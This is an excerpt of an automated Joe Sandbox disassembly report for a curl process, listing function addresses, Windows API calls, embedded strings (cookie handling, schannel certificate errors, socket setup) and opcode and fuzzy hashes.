                                • Opcode ID: ea265fdd9c8b8561dc6a80215a2014486f634520ce9991826757dc0273b23b09
                                • Instruction ID: 0ec46595093f31b70718ef92dd273337ff52ab4afea4db5ccea54b9d6c703fd6
                                • Opcode Fuzzy Hash: ea265fdd9c8b8561dc6a80215a2014486f634520ce9991826757dc0273b23b09
                                • Instruction Fuzzy Hash: 9C318071A05706ABDB169E2CD8857F5B7B4FF44339F784729A85CC72A8D730A824C680
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881E6B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Closing connection %ld
                                • API String ID: 1294909896-1512264877
                                • Opcode ID: ba60b733a99ed5264231623be550fc61ae6d2f99470fb372d062c024bd4d5763
                                • Instruction ID: a29fbb031abb1d95ad1473291051ecc8fb89b74a167b64b77d8178dae17817aa
                                • Opcode Fuzzy Hash: ba60b733a99ed5264231623be550fc61ae6d2f99470fb372d062c024bd4d5763
                                • Instruction Fuzzy Hash: A3216F317005019BD748AA2D9C89BAAF3EAFF84750F244539E919CB3A6CF75EC418790
                                APIs
                                • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,?,00000000,00000000,00000000,?,0086DD03,?), ref: 0086E0C0
                                • ___from_strstr_to_strchr.LIBCMT ref: 0086E0FB
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrfgets
                                • String ID:
                                • API String ID: 4248516992-0
                                • Opcode ID: 22a3ae4cfe696d62a2089f0477a3e36345266ee5ed53d41fe92d781d5614a6d5
                                • Instruction ID: 42575721efa294475212dffeda118eab37d8e10d13c3461fff4aafc21be77be1
                                • Opcode Fuzzy Hash: 22a3ae4cfe696d62a2089f0477a3e36345266ee5ed53d41fe92d781d5614a6d5
                                • Instruction Fuzzy Hash: 4D118C396043069BDB148F28CC01BE9B3E8FF0A305F10409DD285D3241DAB0AA849B51
                                APIs
                                • FreeLibrary.KERNELBASE(00000000,?,00868EF6), ref: 00872208
                                • WSACleanup.WS2_32 ref: 00872227
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CleanupFreeLibrary
                                • String ID:
                                • API String ID: 470324515-0
                                • Opcode ID: 6544e31f9d397f1b4a95b904e8299a851eb3667905ccec011e39a8ed30226d91
                                • Instruction ID: 99aa50cfb28675eacf2bf72d39c91920875915a0bd9a5d620f0cef1f537fa324
                                • Opcode Fuzzy Hash: 6544e31f9d397f1b4a95b904e8299a851eb3667905ccec011e39a8ed30226d91
                                • Instruction Fuzzy Hash: 10F017726216408BF725AF28ED48F693BFAFB09316F584069E708C65A7C774D840CF62
                                APIs
                                  • Part of subcall function 008B167B: GetModuleHandleW.KERNEL32(00000000,008B12E6), ref: 008B167D
                                • _c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 008B132F
                                • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,008CD000,00000014), ref: 008B135E
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: HandleModule_c_exit_exit
                                • String ID:
                                • API String ID: 750871209-0
                                • Opcode ID: 3c1777749d1cee31703bb350baeb5762b3e2989e4a6dd223fce7200e68ead2c0
                                • Instruction ID: 6129d89affa54c2a0960122b8c6be08f8d8819f89d7d8d38770cd2e918753b31
                                • Opcode Fuzzy Hash: 3c1777749d1cee31703bb350baeb5762b3e2989e4a6dd223fce7200e68ead2c0
                                • Instruction Fuzzy Hash: EDE0867190424D8FCF219B98D9063DCB7B1FB45324F140159D811BB791D73919018691
                                APIs
                                • socket.WS2_32(00000017,00000002,00000000), ref: 0088E9A6
                                • closesocket.WS2_32(00000000), ref: 0088E9B2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: closesocketsocket
                                • String ID:
                                • API String ID: 2760038618-0
                                • Opcode ID: d5aa4005215b48e97cc7790e5ec030a87ef7823f9aac703b171f1bd091158f7f
                                • Instruction ID: f088c0eb93740e7f1b1e4f32ac45a79e5451a76142ab289af4b467fa6547d431
                                • Opcode Fuzzy Hash: d5aa4005215b48e97cc7790e5ec030a87ef7823f9aac703b171f1bd091158f7f
                                • Instruction Fuzzy Hash: A1D0A7742466049FDE206B744C9DFAA3F59BB01326F5467B4F866CB2E1C3A18C13A720
                                APIs
                                • closesocket.WS2_32(00881EF4), ref: 0087F433
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: closesocket
                                • String ID:
                                • API String ID: 2781271927-0
                                • Opcode ID: 75aa9e22192b8ed53861daf1fe9cc595f50cdab3c79d4e71ba2b64cdb0062cdb
                                • Instruction ID: 59045c17fa989de5dac32bd00f99bafc8bb09f112dc1102d75eb0ae586be95fb
                                • Opcode Fuzzy Hash: 75aa9e22192b8ed53861daf1fe9cc595f50cdab3c79d4e71ba2b64cdb0062cdb
                                • Instruction Fuzzy Hash: 5201A2316046148BC7256B39988976FB7D6FF88314F08813DE54ED3255CA75EC4582D6
                                APIs
                                • _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,00862077,?,00008501,00000180), ref: 00870B2D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _open
                                • String ID:
                                • API String ID: 4183159743-0
                                • Opcode ID: b18056c5b9e2add19f108bd2fdb1f1f9edbe4bc4e7282008e8587c5e26a6099e
                                • Instruction ID: 5c2a4522815475d0d5bf8e65c644b751973878e72716a2947ae6f1b141c9686f
                                • Opcode Fuzzy Hash: b18056c5b9e2add19f108bd2fdb1f1f9edbe4bc4e7282008e8587c5e26a6099e
                                • Instruction Fuzzy Hash: 2CD0123100020DABCF014F64EC05A9A3BE8BF48354F04C014FD2C84120D771D974AF40
                                APIs
                                • SetConsoleMode.KERNELBASE(008631F4), ref: 008631D9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ConsoleMode
                                • String ID:
                                • API String ID: 4145635619-0
                                • Opcode ID: f391d0eadffdeb1da255269bd091ee31617e33c96eeaf1181f87b9b199b0ea45
                                • Instruction ID: 39927d353f5b2537979d83b12b723bf0c1a6cc92faa7211442b67d3c75aaefe0
                                • Opcode Fuzzy Hash: f391d0eadffdeb1da255269bd091ee31617e33c96eeaf1181f87b9b199b0ea45
                                • Instruction Fuzzy Hash: 92C04830201602AFEF03CF78AD18A283AB3FB4A3063010078E725C5276EE32C912DB50
                                APIs
                                • FreeLibrary.KERNELBASE(00000000,00872221,?,00868EF6), ref: 00894EE2
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 682866d55a0bee86f1e18bb0b41cc77b3f02fb488e688e9310b0f7e1cf5e5323
                                • Instruction ID: f6721a4762c027445ffcf1824f705a96a3a0bedebc5cb6954d27071d9eac9451
                                • Opcode Fuzzy Hash: 682866d55a0bee86f1e18bb0b41cc77b3f02fb488e688e9310b0f7e1cf5e5323
                                • Instruction Fuzzy Hash: 55C04C75510A828FFB109F28EC08F1633B5F700767F444564B301C1462D7788405CA10
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088D06B
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 29e133beb5cdb9633e1457069bffdcbb6da9ac54e5681a98c35616c2eed7b53d
                                • Instruction ID: e9905cb0a8c83394a585239551ef3ea4fefb58a1edb36191f6f04bf27c8cfcd9
                                • Opcode Fuzzy Hash: 29e133beb5cdb9633e1457069bffdcbb6da9ac54e5681a98c35616c2eed7b53d
                                • Instruction Fuzzy Hash: 7FF05E32700B129BD7149F28E884759B3B5FB44761F25412AE810C3681CB79A9518BE5
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00877B80
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: 9c4e14a95bd1829e2e676cab32383680e0dec0cbbfae7ba63704bbeb6ee09fe7
                                • Instruction ID: c4b975bb27902bca61852d05231dc2d7087bcc51909d491684a8c45080bf26b5
                                • Opcode Fuzzy Hash: 9c4e14a95bd1829e2e676cab32383680e0dec0cbbfae7ba63704bbeb6ee09fe7
                                • Instruction Fuzzy Hash: E4E0867270D5159EF7048B28FC00B99B7D9FB94720F004137D118C3148DBB0A8418A90
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00000000,00000000,?,008809DF,?,00000001,0000000C,00000000,00000000,00000001), ref: 0087FB30
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087FB5E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087FBA1
                                • ___from_strstr_to_strchr.LIBCMT ref: 0087FBAC
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Secure-,0000005F,00000009), ref: 0087FD02
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Host-,?,00000007), ref: 0087FD23
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087FE2F
                                • ___from_strstr_to_strchr.LIBCMT ref: 0087FE73
                                • ___from_strstr_to_strchr.LIBCMT ref: 0087FFC8
                                • ___from_strstr_to_strchr.LIBCMT ref: 0087FFE5
                                • ___from_strstr_to_strchr.LIBCMT ref: 0088012C
                                • _strrchr.LIBCMT ref: 0088013A
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088016E
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,#HttpOnly_,0000000A), ref: 008801D0
                                • ___from_strstr_to_strchr.LIBCMT ref: 008801F0
                                • ___from_strstr_to_strchr.LIBCMT ref: 00880201
                                • ___from_strstr_to_strchr.LIBCMT ref: 00880610
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008806CC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008806E0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008806F4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00880708
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088071C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00880730
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00880744
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00880758
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00880778
                                  • Part of subcall function 0087F9D3: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087F9EA
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088086B
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008808DD
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0088093F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088096E
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00880992
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,0088126F), ref: 00880A02
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00880A14
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$___from_strstr_to_strchr$strncmp$callocfclosemalloc$__acrt_iob_func_strrchr_time64
                                • String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$=$Added$FALSE$Replaced$TRUE$WARNING: failed to open cookie file "%s"$_$_$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$none$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                • API String ID: 2930520296-3004133991
                                • Opcode ID: 11815f685764a12fa21ac2bfb5fc3d042f7a2d098e464efc3c5de7ad5d464098
                                • Instruction ID: c87b8cfb13c93875ad9d80fd2b7f567895f1ea49d4f43b398e949ab0ef75ad6a
                                • Opcode Fuzzy Hash: 11815f685764a12fa21ac2bfb5fc3d042f7a2d098e464efc3c5de7ad5d464098
                                • Instruction Fuzzy Hash: 9B926431A0475A8FEB25AF299C547A97BA1FF05310F1881BAD949D7283DB70DC88CF91
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008A3FA5
                                  • Part of subcall function 008A3BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 008A3BC3
                                  • Part of subcall function 008A3BB5: _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 008A3BE1
                                  • Part of subcall function 008A3BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 008A3CC8
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B8DD4), ref: 008A3FF1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008A4092
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 008A40AD
                                • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008A40CA
                                • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000001,00000000), ref: 008A40F3
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008A4109
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A4140
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000), ref: 008A4161
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A418D
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A41F4
                                • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000008,?,00000000,00000000,00000001), ref: 008A4214
                                • PFXImportCertStore.CRYPT32(?,00000000,00000000), ref: 008A422D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A4244
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A427E
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008A4285
                                • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00000000,00000000,00000000), ref: 008A42CF
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008A42E3
                                • CertCloseStore.CRYPT32(?,00000000), ref: 008A4301
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008A4321
                                • CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 008A4345
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008A4355
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A4380
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008A438C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A43A6
                                • CryptStringToBinaryA.CRYPT32(?,00000028,00000004,?,00000014), ref: 008A43D5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008A43E4
                                • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00010000,00000014,00000000), ref: 008A4415
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008A4426
                                • CertCloseStore.CRYPT32(?), ref: 008A4456
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008A4470
                                • CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008A449C
                                • CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008A44EC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A452A
                                Strings
                                • schannel: unable to allocate memory, xrefs: 008A4480
                                • schannel: Failed to get certificate location or file for %s, xrefs: 008A4312
                                • schannel: Failed to get certificate from file %s, last error is 0x%x, xrefs: 008A42F0
                                • Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 008A3F29
                                • schannel: Failed to open cert store %x %s, last error is 0x%x, xrefs: 008A4363
                                • (memory blob), xrefs: 008A402B, 008A4038, 008A4075
                                • schannel: certificate format compatibility error for %s, xrefs: 008A4039
                                • schannel: Failed to import cert file %s, password is bad, xrefs: 008A4296
                                • schannel: Failed to read cert file %s, xrefs: 008A4123
                                • Microsoft Unified Security Protocol Provider, xrefs: 008A44C8
                                • schannel: Failed to import cert file %s, last error is 0x%x, xrefs: 008A42B0
                                • P12, xrefs: 008A4017
                                • schannel: AcquireCredentialsHandle failed: %s, xrefs: 008A4506
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$Cert$Store$Certificate$ErrorLast$CloseContextFindFree_mbschrfseekmalloc$BinaryByteCharCryptImportMultiOpenStringWide_mbsnbcmp_strdupcallocfclosefopenfreadftell
                                • String ID: (memory blob)$Microsoft Unified Security Protocol Provider$P12$Unable to set ciphers to passed via SSL_CONN_CONFIG$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                • API String ID: 2859572553-531812395
                                • Opcode ID: 6aa58f004739b5bb0d9723172c25b2b4a3a4ab3ef74c3cabd4f7d3b752affb8a
                                • Instruction ID: a214b434ac7b9b82911cbe55a732564879488368a1b51e298629cb55d3ceb4c1
                                • Opcode Fuzzy Hash: 6aa58f004739b5bb0d9723172c25b2b4a3a4ab3ef74c3cabd4f7d3b752affb8a
                                • Instruction Fuzzy Hash: 8E02A471A4061ADBEF209B64DC84BEE77B8FF46714F1441A9E909E7641DBB09E808F90
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089A997
                                • ___from_strstr_to_strchr.LIBCMT ref: 0089A9B5
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0089AA1F
                                • ___from_strstr_to_strchr.LIBCMT ref: 0089AA33
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 0089AA4B
                                • ___from_strstr_to_strchr.LIBCMT ref: 0089AA5A
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 0089AA6B
                                • getsockname.WS2_32(?,?,?), ref: 0089AB16
                                • WSAGetLastError.WS2_32 ref: 0089AB21
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089ABEA
                                • WSAGetLastError.WS2_32 ref: 0089AC18
                                • htons.WS2_32(?), ref: 0089AC95
                                • bind.WS2_32(000000FF,?,00000080), ref: 0089ACB3
                                • WSAGetLastError.WS2_32 ref: 0089ACC1
                                • getsockname.WS2_32(?,?,00000080), ref: 0089AD1D
                                • WSAGetLastError.WS2_32 ref: 0089AD53
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A0C3
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0CB
                                  • Part of subcall function 0087A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0DD
                                  • Part of subcall function 0087A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 0087A0EC
                                  • Part of subcall function 0087A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0087A0F6
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A142
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A15C
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A173
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A180
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A188
                                  • Part of subcall function 0087A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A193
                                  • Part of subcall function 0087F3FC: closesocket.WS2_32(00881EF4), ref: 0087F433
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089B090
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
